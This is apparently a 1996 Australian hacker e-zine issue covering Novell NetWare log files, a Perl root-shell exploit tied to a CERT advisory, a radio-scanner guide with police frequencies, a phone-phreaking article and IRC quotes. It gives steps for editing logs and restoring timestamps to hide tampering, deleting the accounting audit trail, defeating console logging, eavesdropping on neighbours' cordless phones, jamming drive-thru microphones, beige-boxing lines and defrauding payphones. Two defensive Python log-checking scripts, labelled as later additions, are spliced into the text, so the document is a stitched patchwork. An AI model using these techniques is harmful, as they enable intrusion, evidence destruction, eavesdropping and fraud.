SYS$LOG ERR 78,684 2-09-96 11:30p [Rw-A--------------] SUPERVISOR
78,684 bytes in 1 files
81,920 bytes in 20 blocks
System error log. This file is an ascii file and is readable by any standard
editor or viewer. Can be read from within SYSCON/Supervisor options/View file
Server Error Log. After reading press ESCAPE to exit. You will be prompted to
clear the error log. Answer yes or no. It contains entries of events such as
Intruder Lockouts, volume mounts and dismounts.
A better way to edit log files is to load "filer" before you edit the file.
Note the dates created, last access and who owns the file. Then edit the file,
re-enter filer and change the dates/owner back to the originals.
Here are some example entries in the system logger:
8/19/95 1:29:22 pm Severity = 4.
1.1.136 FS3 NetWare Copyright Violation! Call SUPERVISOR!
Server at address FACADE99:000000000001 also has my serial number
12/14/95 1:03:01 pm Severity = 0.
1.1.110 System time changed by station 25 to 12/14/1995 12:52:48 pm
2/8/96 11:30:43 pm Severity = 0.
1.1.63 Bindery close requested by user BACKUP on station 34
2/8/96 11:30:45 pm Severity = 0.
1.1.61 Bindery open requested by user BACKUP on station 34
2/9/96 2:08:13 pm Severity = 0.
0.0.0 Remote Console Connection Granted for 00000002:0000E8CF7661
2/9/96 2:08:24 pm Severity = 0.
0.0.0 Remote Console Connection Cleared for 00000002:0000E8CF7661
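The entries above are exactly what an administrator wants pulled out of SYS$LOG.ERR automatically: a clock that was moved, a bindery that was closed and reopened, and a remote console session. The script below is an added example, not part of the original article. It parses the two-line entry format using the sample entries copied from the excerpt above; the function names, the finding labels and the 60 second clock tolerance are assumptions.

```python
import re
from datetime import datetime

HEADER = re.compile(
    r"^(\d{1,2}/\d{1,2}/\d{2})\s+(\d{1,2}:\d{2}:\d{2})\s+([ap]m)\s+Severity = (\d+)",
    re.I)
BINDERY = re.compile(r"Bindery (close|open) requested by user (\S+) on station (\d+)")
RCONSOLE = re.compile(
    r"Remote Console Connection Granted for ([0-9A-F]+:[0-9A-F]+)", re.I)
TIMESET = re.compile(
    r"System time changed by station (\d+) to "
    r"(\d{1,2}/\d{1,2}/\d{4})\s+(\d{1,2}:\d{2}:\d{2})\s+([ap]m)", re.I)


def parse_stamp(date, clock, half):
    """Build a datetime from 'M/D/YY', 'H:MM:SS' and 'am'/'pm'."""
    month, day, year = (int(x) for x in date.split("/"))
    hour, minute, second = (int(x) for x in clock.split(":"))
    if year < 100:
        year += 1900            # assumption: two-digit years here are 19xx
    hour = hour % 12 + (12 if half.lower() == "pm" else 0)
    return datetime(year, month, day, hour, minute, second)


def parse_log(text):
    """Return [(timestamp, message)]; message lines are joined per entry."""
    entries = []
    for line in (raw.strip() for raw in text.splitlines()):
        header = HEADER.match(line)
        if header:
            entries.append([parse_stamp(*header.group(1, 2, 3)), ""])
        elif entries and line:
            entries[-1][1] = (entries[-1][1] + " " + line).strip()
    return [(when, message) for when, message in entries]


def detect(entries, max_clock_shift=60):
    """Return (timestamp, kind, detail) findings in log order."""
    findings, closed = [], {}
    for when, message in entries:
        bindery = BINDERY.search(message)
        console = RCONSOLE.search(message)
        clock = TIMESET.search(message)
        if bindery:
            action, user, station = bindery.groups()
            if action == "close":
                closed[user] = when
            elif user in closed:
                gap = int((when - closed.pop(user)).total_seconds())
                findings.append((when, "bindery-window",
                                 f"{user} on station {station} kept the bindery closed for {gap}s"))
        elif console:
            findings.append((when, "rconsole",
                             f"remote console session from {console.group(1)}"))
        elif clock:
            shift = int((parse_stamp(*clock.group(2, 3, 4)) - when).total_seconds())
            if abs(shift) > max_clock_shift:
                findings.append((when, "clock-change",
                                 f"station {clock.group(1)} moved the clock {shift:+d}s"))
    for user, when in closed.items():        # closed and never reopened
        findings.append((when, "bindery-left-closed", user))
    return findings


# Sample entries copied from the log excerpt in the article.
SAMPLE_LOG = """\
8/19/95 1:29:22 pm Severity = 4.
1.1.136 FS3 NetWare Copyright Violation! Call SUPERVISOR!
Server at address FACADE99:000000000001 also has my serial number
12/14/95 1:03:01 pm Severity = 0.
1.1.110 System time changed by station 25 to 12/14/1995 12:52:48 pm
2/8/96 11:30:43 pm Severity = 0.
1.1.63 Bindery close requested by user BACKUP on station 34
2/8/96 11:30:45 pm Severity = 0.
1.1.61 Bindery open requested by user BACKUP on station 34
2/9/96 2:08:13 pm Severity = 0.
0.0.0 Remote Console Connection Granted for 00000002:0000E8CF7661
2/9/96 2:08:24 pm Severity = 0.
0.0.0 Remote Console Connection Cleared for 00000002:0000E8CF7661
"""

if __name__ == "__main__":
    for when, kind, detail in detect(parse_log(SAMPLE_LOG)):
        print(when.isoformat(sep=" "), kind, detail)
```

Because the log is a plain file that can be edited, run a check like this against a copy taken to another machine at regular intervals.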
FS3/SYS:SYSTEM
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
NET$ACCT DAT 34,528 2-12-96 3:00p [RwSA-----T--------] FS3
34,528 bytes in 1 files
36,864 bytes in 9 blocks
Netware audit trail. If accounting is installed on the server then all logins
and logouts are recorded here along with disk read and writes if charging is
in force. Note the file is flagged with a T meaning transactional file, and
cannot be deleted when this attribute is set. To remove this flag from the file:
flag net$acct.dat -t
and then delete the file. The system will generate a new file flagged
appropriately at the time of the next event.
FS3/SYS:
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
TTS$LOG ERR 7,828 2-02-96 1:16p [RwSA--------------] SUPERVISOR
7,828 bytes in 1 files
8,192 bytes in 2 blocks
Here are some example entries in the transactional log:
Friday February 2, 1996 1:17:50 pm
TTS has been shut down
Friday February 2, 1996 1:16:23 pm
Initializing Transaction Tracking System
FS3/SYS:
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
VOL$LOG ERR 14,009 2-02-96 1:16p [RwSA--------------] SUPERVISO
14,009 bytes in 1 files
16,384 bytes in 4 blocks
In the root of each volume there exists an ascii file vol$log.err. This
records the date and time of the last known good mount of that particular
volume. Where a volume is not preceded by a volume dismount, assuming that
this is not the start of a new file, this is an indication that a server crash
or abend has occurred.
Here are some example entries in the volume logger:
Volume SYS mounted on Monday August 7, 1995 4:43:52 pm.
Volume SYS mounted on Monday August 7, 1995 5:17:01 pm.
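The check described above, as an added example that is not part of the
original article: a Python script that reads vol$log.err text and reports every
mount of a volume that follows another mount with no dismount in between. The
"dismounted" line format and every sample entry after the first two are
assumptions constructed for illustration.

```python
import re
from datetime import datetime

# "mounted" lines follow the sample entries quoted in the article. The
# "dismounted" form is an ASSUMPTION: it is taken to mirror the mount line.
EVENT_RE = re.compile(
    r"^Volume (?P<vol>\S+) (?P<event>mounted|dismounted) on "
    r"(?P<when>\w+ \w+ \d{1,2}, \d{4} \d{1,2}:\d{2}:\d{2} [ap]m)\.?$",
    re.IGNORECASE,
)
STAMP_FORMAT = "%A %B %d, %Y %I:%M:%S %p"

# First two lines are the article's sample; the rest are constructed.
SAMPLE_LOG = """\
Volume SYS mounted on Monday August 7, 1995 4:43:52 pm.
Volume SYS mounted on Monday August 7, 1995 5:17:01 pm.
Volume SYS dismounted on Tuesday August 8, 1995 9:02:10 am.
Volume SYS mounted on Tuesday August 8, 1995 9:05:44 am.
Volume VOL1 mounted on Tuesday August 8, 1995 9:05:51 am.
Volume VOL1 mounted on Wednesday August 9, 1995 11:30:00 pm.
"""


def parse_events(text):
    """Return [(volume, event, timestamp)] for every recognised log line."""
    events = []
    for raw in text.splitlines():
        line = " ".join(raw.split())  # collapse runs of whitespace
        match = EVENT_RE.match(line)
        if match is None:
            continue  # blank lines or any other text in the file
        when = datetime.strptime(match["when"], STAMP_FORMAT)
        events.append((match["vol"].upper(), match["event"].lower(), when))
    return events


def unclean_mounts(text):
    """Find mounts that were not preceded by a dismount of the same volume.

    Returns a list of (volume, mount_time, previous_mount_time). The first
    entry seen for a volume is never reported, because it may simply be the
    start of a new log file.
    """
    last_seen = {}  # volume -> (event, timestamp)
    findings = []
    for vol, event, when in parse_events(text):
        previous = last_seen.get(vol)
        if event == "mounted" and previous and previous[0] == "mounted":
            findings.append((vol, when, previous[1]))
        last_seen[vol] = (event, when)
    return findings


if __name__ == "__main__":
    for vol, when, prev in unclean_mounts(SAMPLE_LOG):
        print(f"{vol}: mounted {when} with no dismount since {prev} "
              "(possible crash or abend)")
```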
sys:\etc\conlog.log
A site running conlog.nlm will have a console log file. This file logs all
activities on the console. When conlog.nlm is loaded, the log file is zero
bytes and can be typed, but not edited. To edit the log file, the nlm must be
unloaded from the console. When downing the server, if conlog is not unloaded,
an error message is sent to the console.
To defeat console logging, down the server through the following commands.
Remove Dos
Down
Exit
This will work due to the fact that the console.log is deleted and re-created
every time the conlog is loaded.
A listing of what some utilities can do to penetrate Novell Netware
-------------------------------------------------------------------
Trojan the Netware login process
Netware Password cracker, that encrypts password attempts
Key Stroke Logger
Delays NLM commands on the console
Check for null passwords.
How to break the rconsole encryption.
Break the rconsole encryption.
Create a super-user from the console.
Change any users password from the console.
Become super-user on 3.11 without Packet Signatures.
Grant super rights, then allow them to be toggled.
Create a temporary file server.
Remove the delete inhibit flag.
Play with Netware's bindery.
There is a set of utilities called the JRButils. The latest version being
V2.30.
Please send comments or suggestions to diceman@fl.net.au
._________________________________________________________________________.
-= CERT Advisory Snippet Issue #1
-= Perl Exploit
The relevant CERT Advisory is CA-96.12. The vulnerability results in anyone
with access to an account gaining root access.
Within the next issue, there should be a detailed explanation of the exploit.
<------------------------------- cut ---------------------------------------->
#!/usr/bin/perl -U
# Remember to chmod 4755
#
# This exploit is a little aged although it might work.
#
$ENV{PATH}="/bin:/usr/bin";
$>=0;
$<=0;
exec("/bin/bash");
<------------------------------- cut ---------------------------------------->
Every month we will be investigating recent CERT advisories & reporting back
the bugs & the patches.
.____________________________________________________________________________.
/-\./-\./-\./-\./-\./-\
| Scanning Made Easy |
| By Myst |
\-/.\-/.\-/.\-/.\-/.\-/
This is an article to help you novice scanner people out there get the most
when buying and using your scanner (I don't mean picture scanning either;)
-= What are scanners? =-
Scanners are devices used to receive all those wonderful radio signals
that pass through our bodies every second of every day. They are capable of
receiving only, therefore are NOT illegal (Although some scanners which can
reach the mobile phone frequencies are now considered illegal). They allow
the user to hear the wonders of the city around them, before the news and
radio stations even know what's going on. By listening in to the police
(not illegal:), fire departments, telstra and even TV stations etc you are
able to hear all the latest and greatest news.... Car crashes,
Armed Robbery, Domestic Disputes, even hear the cops bitchin' over who ate
the last doughnut :)
-= Where can I get one of these wonderful devices? =-
Well, if you're the rich and lazy type, try your local Dick Smith store (What
don't they hold??:), or if you prefer to get something a little more worth
the value, try speciality shops that stock amateur radio equipment, they
are bound to have better prices, but you never know, shop around a bit first.
You can even order them off the internet (I think), but that's at your own risk.
It is also possible that some old (often still good in value) scanners are
available at HAM conventions. This is basically just a get together of
Amateur Radio guys/gals to sell off old equipment and have some fun on the
activities. Even look in the paper, you just never know (New scanners are
made to not access the mobile phone frequencies, but the older ones
still can, so they are sometimes a better buy).
-= What should I look for when buying a scanner? =-
Well, it does kinda depend on the price range and whether you want a portable
or base station type (portables can be taken with you on your trips around the
world, whereas a base station is placed at one location and usually not
moved).
The major pros with portables are that they are usually cheaper and can be
taken to sporting events etc, but they often compromise a bit in the
quality and clearness of the signal (this also depends on the brand of
scanner and the antennae in use).
Because base stations are rarely moved around, it is wise to have a mounted
antenna somewhere on your roof. This gives better range and is especially
good for picking up those city transmissions from within the country. This
often makes base station models a wiser choice, but there is nothing stopping
you from using a roof mounted scanning antenna with your portable whilst at
home, and then a little rubber duckie (flexible antenna for those who don't
know) or similar whilst outside soaking up the sun. Also, base stations
often have extra features that are not found on some portable models.
Sum up your own needs and decide which would be better for you.
-= What brand should I get? =-
Generally stick with Uniden, Cobra etc. It again depends on price and the
functions you may want (See below). Ask around a bit and see what the dealers
can do for you. Generally radio equipment is always pretty good on the
quality side, but like always there are some that don't quite cut it.
-= What functions are available in scanners? What functions will I want? =-
Most (all?) scanners have the ability to store frequencies. You WILL want
this. It is pretty much a standard thing. The older models start off with
a 16 channel memory, with some of the later models having 100, 300 or even
500 channel capacities.
You program these memory channels with desired frequencies, then you can make
your scanner scan them for any activity. Different model scanners can scan
these memories faster than others.
Other important features include:
Data Skip - This feature allows the scanner to skip over unwanted data
transmissions and substantially stops you from hearing interference signals
or annoying signals.
Priority Channels - These are programmed with the most important frequencies.
Then whilst monitoring other stuff, the scanner can be made to check these
for activity automagically, every few seconds. Useful feature.
Programmable Searching - This allows you to search between two frequencies,
for activity.
Channel Lock out - lock channels, so that they are not scanned.
Automatic Store - Automatically searches out and stores frequencies to an
available channel location and automatically returns to find the next active
frequency.
Plus I am sure there are other features, depending upon the make and model.
Ask the sales guy if you're not sure. Hell, that's what they are there for :)
-= I have a scanner, but now what? =-
OKEY! You have a scanner, let's get on the road! But wait, you don't want to
sit around all day searching for 'interesting' frequencies to watch, that
could take forever. Luckily for us, there are people in this world who either
through torture or work (maybe both:) make up frequency lists and distribute
them.
I know that Dick Smith stocks 'some' frequency books, but these you have
to pay for (who wants to pay for things in this world?), so check with local
bulletin boards, the Internet (NO, not that word again;), friends, relatives,
strangers, leave messages, you get the picture. Eventually you *WILL* find
frequencies for your area. If you live in or near major cities, then I can
guarantee you that there are frequency lists for your area. I will even
include some with this article (I am a generous kind of guy).
You want frequencies! Then frequencies you will get!
First a few rules to 'safe' scanning, yes they must be told :)
* Don't get in the way of emergency people! If you hear of a
fire or whatever, think twice before rushing out and getting in the way.
Just use your brain, that's all I am saying :)
* Don't poke your rubber duckie antenna in your eye (yes they do hurt;)
* Computers and the like can interfere majorly with the operation of
scanners, causing unwanted interference, so generally keep them separated.
* Always strap your scanner on your side, before leaving the house, unless
you plan on going to: 1. Your girlfriend's house
2. A party
3. A fun park
4. Anywhere you might end up pissed :)
Now, on with the list!
These are just frequencies I have collected from numerous sources over the
years. I don't guarantee any of them. Most are fairly recent though and
*should* work. This is by far not a complete list (it comes nowhere close).
To find more comprehensive lists, try the web/ftp links at the bottom of the
article.
-= POLICE =-
<Frequency> <Callsign> <City>
123.100 VKC MELBOURNE
123.200 VKC MELBOURNE
131.600 VKC MELBOURNE
156.375 VKC MELBOURNE
156.675 VKC MELBOURNE
156.725 VKC MELBOURNE
168.250 VKC MELBOURNE
168.400 VKC MELBOURNE
413.975 VJV434 MELBOURNE
450.525 VKC MELBOURNE
450.650 VKC MELBOURNE
450.675 VKC MELBOURNE
468.000 - 470.000 VKC MELBOURNE
852.7875 VKC MELBOURNE
467.850 PERTH
467.875 PERTH
467.900 PERTH
467.925 PERTH
467.950 PERTH
467.975 PERTH
468.000 PERTH
468.025 PERTH
468.050 PERTH
468.075 PERTH
468.100 PERTH
468.125 PERTH
468.150 PERTH
468.175 PERTH
468.200 PERTH
468.225 PERTH
468.250 PERTH
468.275 PERTH
468.300 PERTH
468.325 PERTH
468.350 PERTH
468.375 PERTH
468.400 PERTH
468.425 PERTH
468.450 PERTH
468.475 PERTH
468.500 PERTH
468.525 PERTH
468.550 PERTH
468.575 PERTH
468.600 PERTH
468.625 PERTH
468.650 PERTH
468.675 PERTH
468.700 PERTH
468.725 PERTH
468.750 PERTH
468.775 PERTH
468.800 PERTH
468.825 PERTH
468.850 PERTH
468.875 PERTH
468.900 PERTH
468.925 PERTH
468.950 PERTH
468.975 PERTH
469.000 PERTH
469.025 PERTH
469.050 PERTH
469.075 PERTH
469.100 PERTH
469.125 PERTH
469.150 PERTH
469.175 PERTH
469.200 PERTH
469.225 PERTH
469.250 PERTH
469.275 PERTH
469.300 PERTH
469.325 PERTH
469.350 PERTH
469.375 PERTH
469.400 PERTH
469.425 PERTH
468.400 SYDNEY
468.525 SYDNEY
468.950 SYDNEY
468.450 NTH SYDNEY
468.200 NTH SYDNEY
468.925 NTH SYDNEY
468.725 SYDNEY
467.900 SYDNEY
469.300 SYDNEY
468.075 SYDNEY
467.950 SYDNEY
468.750 SYDNEY
468.700 SYDNEY
468.000 SYDNEY
468.425 SYDNEY
469.275 SYDNEY
468.675 SYDNEY
468.375 SYDNEY
468.550 SYDNEY
469.075 SYDNEY
468.475 SYDNEY/CAR 2 CAR
468.775 SYDNEY/CAR 2 CAR
458.950 Alice Springs / N.T.
458.975 Alice Springs / N.T.
468.450 Alice Springs / N.T.
468.475 Alice Springs / N.T.
-= AMBULANCE =-
<Frequency> <Callsign> <City>
412.5000 VL3NE MELBOURNE
412.5250 VH3HYA MELBOURNE
412.7500 VL3NE MELBOURNE
413.0750 VL3NE MELBOURNE
413.3500 VL3NE MELBOURNE
413.4250 VL3WX MELBOURNE
470.4000 VM3SJ MELBOURNE
470.9750 VM3SJ MELBOURNE
453.825 Northern Territory
454.125 Northern Territory
462.950 Alice Springs
463.325 Northern Territory
463.625 Alice Springs
-= FIRE BRIGADE =-
<Frequency> <Callsign> <City>
458.275 MELBOURNE
457.975 MELBOURNE
457.375 MELBOURNE
455.575 MELBOURNE
-= Mobile Phonez! =-
Okey, I don't have much info here, except the stuff from personal experience.
For starters, every scanner sold nowadays will not go within the mobile phone
range. So you might need to look around for some older models, but
make sure to check out in the manuals whether or not they can reach up to
the 800 - 900MHz range. Many Amateur Radio handhelds and others can also
get in the mobile area (If you have your Amateur license of course).
Only analog phonez can be heard from scanners (digital make use of encryption
techniques, so they can be picked up, just not understood).
The only frequency I have experienced mobiles on is between 914.000 and
931.000. The mobile towers seem to pick a frequency between this range,
depending upon the amount of traffic or wotever. So there is no set
frequency that you can always find the phones on. Scan between those two
continuously and you are bound to get something (In my area anyway). I have
no idea whether these are different in other cities (Someone may want to help
me out with all this). Just try it and see what you get.
Also, it is common (where I live anyway) for the phones to 'drop-out' while
someone is in the middle of a conversation and go to another frequency. A
series of 'beeps' is heard a minute or so before this happens.
The only explanation I have for this is that the mobile phone becomes closer
to a different cell and so switches (the new cell choosing a different
frequency). Someone wanna help me out here too? I think I need to do a
Telstra course or something :)
-= Amateur Radio Repeaters =-
These are sometimes interesting to listen to (I emphasise the 'sometimes':)
Instead of re-typing all these out, you can find them in the back of your
handy 'ol Dick Smith book.
Also contained in that book are the UHF CB Repeater listings and some various other
stuff.
Repeaters are just devices that pick up an input signal on one freq.
and then re-transmit that signal with higher power on another freq.
This allows someone with only a small handheld radio to be picked up by
someone a hundred km's away.
-= Telstra Stuff =-
I don't have any! I want some! Can someone please give me some info on
Telstra's frequencies. Like the one used by the repair crews etc (Preferably
for Melbourne, but hey, I'll take what I can get :)
-= Airports =-
Whenever you go to an airport TAKE YOUR SCANNER. They're a great place for all
sorts of interesting transmissions. For instance, the planes, air traffic
controllers, ground people (including refueling trucks etc), P.A systems,
weather reports plus more!
You might even be able to hear some of the radars active - Ground,
long distance etc.
<Frequency> <Callsign> <City>
118.200 Avalon Airport
120.100 Avalon Airport
314.600 Avalon Airport
130.600
130.650 Ansett / Tullamarine
130.950 Ansett / Tullamarine
461.425 Ansett / Tullamarine
463.675 Ansett / Tullamarine
470.175 Ansett / Tullamarine
471.925 Ansett / Tullamarine
131.900 Qantas / Tullamarine
166.660 Qantas / Tullamarine
461.100 Qantas / Tullamarine
464.950 Qantas / Tullamarine
465.625 Qantas / Tullamarine
Most airport activity seems to be between the 120.000 and 135.000 range.
-= FUN STUFF =-
< Cordless Telephones - Hear your neighbours >
Base Unit Only
30.075
30.100
30.125
30.150
30.175
30.200
30.225
30.250
30.275
30.300
Also try these:
Base Handset
43.72 48.76
43.74 48.84
43.82 48.86
43.84 48.92
43.92 49.02
43.96 49.08
44.12 49.10
44.16 49.16
44.18 49.20
44.20 49.24
44.32 49.28
44.36 49.36
44.40 49.40
44.46 49.46
44.48 49.50
46.61 49.67
46.63 49.845
46.67 49.86
46.71 49.77
46.73 49.875
46.77 49.83
46.83 49.89
46.87 49.93
46.93 49.99
< CB's (Who'd wanna listen to them anyway) >
01 - 26.965 11 - 27.085 21 - 27.215 31 - 27.315
02 - 26.975 12 - 27.105 22 - 27.225 32 - 27.325
03 - 26.985 13 - 27.115 23 - 27.255 33 - 27.335
04 - 27.005 14 - 27.125 24 - 27.235 34 - 27.345
05 - 27.015 15 - 27.135 25 - 27.245 35 - 27.355
06 - 27.025 16 - 27.155 26 - 27.265 36 - 27.365
07 - 27.035 17 - 27.165 27 - 27.275 37 - 27.375
08 - 27.055 18 - 27.175 28 - 27.285 38 - 27.385
09 - 27.065 19 - 27.185 29 - 27.295 39 - 27.395
10 - 27.075 20 - 27.205 30 - 27.305 40 - 27.405
< McDonalds - Drivethru staff >
These are pretty low powered things, so don't expect to get them from your
house (Unless, god forbid, you live next door to a McDonalds store).
So get about half a kilometer away at the most (200 meters might be better)
Also, some of the stores may use simplex systems (Transmit on one frequency
receive on another). Just see how things go.
30.840
31.000
33.140
35.020 -- Try this one first
40.430
151.715
151.775
151.895
154.060
154.570
154.600
154.700
165.600
169.445
467.775
457.550
McDonalds Wireless Mic Freqs.
170.245
170.305
171.105
171.905
Another great trick with these is to find the frequency of the mic you talk
into and turn your scanner right up on this frequency.
Put it close to your window, then go through the drivethru. When the lady/man
asks for your order, and you speak a nice lot of feedback is sent to them :)
Could be fun (Thanx to BlkGriff for that idea, although some others did
mention it as well)
< Kids Walkie Talkies >
Some of these operate on AM, generally somewhere close to the CB frequencies.
Some also operate on FM, close to 50 MHz (Sometimes it is written on the
back of the units).
Anything that creates RF energy can be received. So get out that old
Jet Hopper controller, scan for your computer, probably even your microwave..
-= MiSc INfo =-
< POLICE >
If you hear a short burst of 2000Hz tone it means:
1 tone : memo for all cars
2 tones: hold up alarm or serious crime
3 tones: Officer needs urgent help <Prick your ears up, could be interesting>
Also, the police use a code system to abbreviate things. eg. Car 301 code 1
The list of codes I have is about 3 years old, but here it is:
1 On Patrol 24 Suspect on premises
2 In Office 25 Suspect disturbed
3 At Station 26 Brawl
4 Away vehicle check 27 License offence
5 Away premises check 28 Omission Signal
6 At Court 29 Gaming Offence
7 Mobile to office 30 Drunk
8 Mobile to residents 31 Operational exercise
9 ? 32 Drowning
10 Domestic disturbance 33 Deceased
11 Armed suspect 34 Wilful Damage
12 Vehicle accident 35 Knifing
13 Ambulance 36 Larceny (Theft)
14 Assault and robbery 37 ?
15 Alarm - silent 38 ?
16 Ambulance required 39 Suspicious vehicle
17 Alarm - audible 40 Fingerprints
18 Assault 41 ?
19 Officer requires assistance 42 Escapee - Military
20 Burglary 43 Fire
21 Vessel in trouble 44 ?
22 Provide transport 45 Escapee - Mental
23 Peeping Tom 46 Drunk driver
47 Escapee - Civilian 60 Incident at ...
48 Explosion 69 Homicide
49 ? 70 Smash and grab
50 Breaking 71 Special duty
51 Indecent exposure 73 Robbery
52 ? 74 Rape
53 Hit & Run 78 Loitering
54 ? 79 Shooting
55 Indecent assault 80 Warrant at ..
56 ? 81 Wanted, detain
57 ? 86 Wanted: Felony
58 Indecent behaviour 87 Wounding
59 ? 88 Wanted: warrant for misd
97 Plane overdue
98 Plane crash impending
99 Plane crash..
200 Station car 400-449 Boat Squad
300 Divisional Van 470-499 Air wing
400 Crime car 500-539 Licensing
500 C.I.B 100---- Exercise/Inspector
600 Community Policing 560-569 Gaming
700 Special Duty/Solo 570-599 Vice
800 Foot Patrol 600-699 Women
900 Station radio
-= Other Info =-
If you have Internet access, then you can do searches for frequency lists.
Just use InfoSeek or something similar.
Here are some scanner links that might be of interest:
Links to scanner related pages - http://www.li.net/~j4dice/links.html
TBSA Frequency Guide - http://www.tbsa.com.au/locvic.html
Stoopid Scanner Tricks - http://exo.com/~rbarron/
Glen's Links - http://www.geocities.com/SiliconValley/5019/
Also check out the TBSA Frequency guide FTP site:
ftp.tbsa.com.au /pub/scan
I also have in my possession a program that can be used to decode pager tones.
It's called POCSAG Decoder (PD-201.zip) and can operate off scanners and the
like, once a small circuit has been built. So far I have been successful in
getting it to work with pagers made by Link Telecommunications. Telstra
pagers don't seem to work. I think they use a different system called GOLAY.
Anyway, if you would like a copy of this (or have some ideas etc) send me some
mail. I originally found it somewhere on the Internet, so search there as
well. Maybe a newer version will be out.
How to contact me...
Myst (vk3hax)
- darrin@lin.cbl.com.au (Will be down sometime September 1996)
- robinson@smbadm.ballarat.edu.au after September (include my alias at top)
Or on IRC (usually only OzNet) under the name Myst, Mystik or Magik.
._________________________________________________________________________.
-= ozPhreakin' - aCiD XTReMe - August '96
-= Revision 3.1
Catch me on #SeCuRiTY! in OZNET
This text is only to be used as an informative document. I do not encourage
these activities at all, nor will I accept any responsibility in any
circumstances where the below techniques are practised.
The phreaking scene is nearly dead in Oz, all the yankie hype of blueboxing
and redboxing is all bullshit. Telstra having an overly advanced fone system
isn't helpin' us either. But never say never, there is always some way to
break the fone Xchange. Just look at AT&T, some bigshots they are, scoopin'
in $$$ every day, and still they have faults in their system. Can't blame 'em
tho, nobody's perfect, no matter how stinkin' rich ya are.
-=-=-=-=-
Be vewwy careful.
Telstra is watching you. With their ESS system (electronic switching
system), Telstra is able to log every call you make. Even 1800 and operator
assisted numbers. I suggest, if you do try Phreakin' (I do not encourage this
activity) do it very carefully, by not using your own fone or friends/relatives.
Do not repeatedly call a single place in such a short time and do not leave
any names, addresses or numbers. All of this must be common sense for you,
this is just a friendly warning.
-=-=-=-=-
Freecalls.
COCOT's seem to be an easy target for phreakers these days, as they are
poorly made, and telstra don't really give a rats ass about them, after all,
they still are getting the money, even if people are phreakin' them. What is a
COCOT? I'm glad you asked. It stands for Customer Owned Coin Operated
Telephone. Telstra has released many models of these little beauties. The
crude, yet effective way of gettin' free calls off these babies is just
brutal force. Firstly pointed out to me by a friend of mine, he simply hit the
machine to get his 40c call. As it seems, the architecture of the fone
itself has a tiny flaw, which is that coins can simply be knocked out of the
box and into your hand. Knock it a few times and you get enough to buy
yourself a scratchy and hopefully win yourself enough cash to get a mobile
fone. Oh, just in case you're wondering, the fone I was talkin' about is the
goldfone released by telstra. The one with the 'follow on' button on it. This
way is quite brutal, and may attract attention. Also, the payfone is hired by
shops to make money. Abuse the privileges of free calls and you might find a
disgruntled shopkeeper with a $1000 fone bill take away the fone, leaving
you stranded. At the current version of this document this technique still
works.
A technique that I have known about for a while now (but have not yet
perfected) is the 'follow on' trick. Find yourself a gold fone and make
sure nobody else is lookin' at ya. Now, grab the receiver and listen in for the
dial tone. Hold down the follow up button and slam down the receiver, then
pick up the receiver while still holding down the button, and dial away.
Another technique that has been known to work goes back to the COCOTs. If
you look around, you could find yourself a COCOT which is not sold by telstra.
These are usually poorly made thingoes that are available to the public
from Dick Smith for a few hundred bucks and can be plugged into any fone
socket. You can usually find these at pubs and newsagencies. One trick you can
do is just trace the fone line to the socket in the wall, whip out your beige
box, and connect it to that. Most cases the line is hidden behind something,
so you could just cut the line and use that to beige box. A technique that
has only worked once for me is using a tone dialer on them. Dial up a 1800
number which will be free, and get the person on the other side to hangup. The
fone will reset itself and go back to the dial tone. The keypad is now still
disabled so you just whip out the tone dialer and dial away.
Get yourself a fone number to any payfone, dial it using a mobile or
whatever, then pick up the receiver of the fone you dialed. Hang up the other
end and then whip out your tone dialer. You may realise that the touch pad is
disabled, so then flick the hook once, and it should hang up the line. The fone
resets itself, so you use the tone dialer to dial the number you want. This
trick works great if you know the number to any box that is close to another
one. All you spend is 40c for the call, and you get yourself free STD/0055/IDD
calls. You can also get some numbers that dial your number back. Useful to
boxes that aren't close to others.
-=-=-=-=-
1800's
Free calls are a fun thing to do, even more fun when they're totally
legal. This is where the 1800 Xchange comes in. Once known as 008 numbers,
these are free to the caller from a home fone or a payfone. Scanning these
numbers may get you some juicy connections. A data line, fax line,
international line or even an adult service line.
Adult services.
You may think these numbers are perverted, or you may think they are the
best thing since sliced bread, but they have many other applications for a
fone phreak to use. Call one up and use a credit card number (I'm sure U know
what I'm hinting at here) now get someone you know to call it and do the same.
You now have yourself a conference line. Ask nicely if the fone sex chic could
just let you talk to your friends. She shouldn't mind as she is getting
paid for all that, but others who you dont know may be in the room at the same
time, so pay some respect to these women and do wat they say.
More next issue!
.____________________________________________________________________________.
.___________________.._____..__________________.
| #SECURiTY LaME & WIERD QU0TES |
| ASSEMBLED BY THE CLD CREW |
'______________________________________________'
<dude> does anyone know how to phreak in australia?
<dude> i have been trying but have had no luck
<DKiNG> duh!
* TWILIGHT is rolling on the floor, laughing at dude until he
just about pukes!
<DKiNG> next dumb question
<dude> anyone have any tips?
> anyone have any CC#'s ... h0h0h0h0h0
<nemesis> anyone got any warez sites :>
<aCiDX> yeah dude.. find one of those pits in the ground (not
the ones with a T on it.. thats not what youre looking for)
and go in, and play with the cables. the think ones are
phone lines
<aCiDX> once in there, you plug in your phone, and free calls
<dude> haha
<dude> no seriously
<aCiDX> i am
<aCiDX> its called pitting
<aCiDX> its a phreaking technique
<nemesis> he is
<aCiDX> the ones marked as telstra are actually power supplies.
the other ones actually contain the phone cables
<TWILIGHT> im gonna have to do some serious link chasing nem
the page will be found!
<DKiNG> another one.......walk upto some dude, belt him around
the head, take his mobile and use it till it ties :>
<aCiDX> shhh dking! dont tell him our techniques
> ties ... i have not tried that ;)
<DKiNG> acidx: sorry man just tryig to be helpful
<DKiNG> good site for info http://www.sentry.afp.gov.au/~phreak
<aCiDX> to get free calls on normal payfones, dial
0002663##**#<number you want to dial>5571<operator assistance
button>##*
<nemesis> dont tell him all our secrets acidx
<aCiDX> telstra wil never be able to block that technique nems
<DKiNG> *dude* thanks for the help
<aCiDX> unless they change every hardware in australia, that
technique will work
<dude> unreal!
<dude> thanks
<aCiDX> 0002663 will enable the linesman operating system
<aCiDX> have to type it in really fast or it wont work
<aCiDX> ##**# will get it to test a phone connection, so you
put in any number you want to call, and 5571 is the code, op
asst will initialise the connection, and ##*. well, dunno
what that does
<dude> how long do you have to hold in the op assitant button
<aCiDX> hold itfor about 5 secs
<aCiDX> maybe 6..
<dude> oh dking do you have another site that one doesn't work!
<aCiDX> its totally untraceable too. as ESS does not log it as
a call
<aCiDX> call anyone, theres absolutely no way (unless someone
is testing the line at he time) to find out who you call and
where
<aCiDX> works for all numbers too
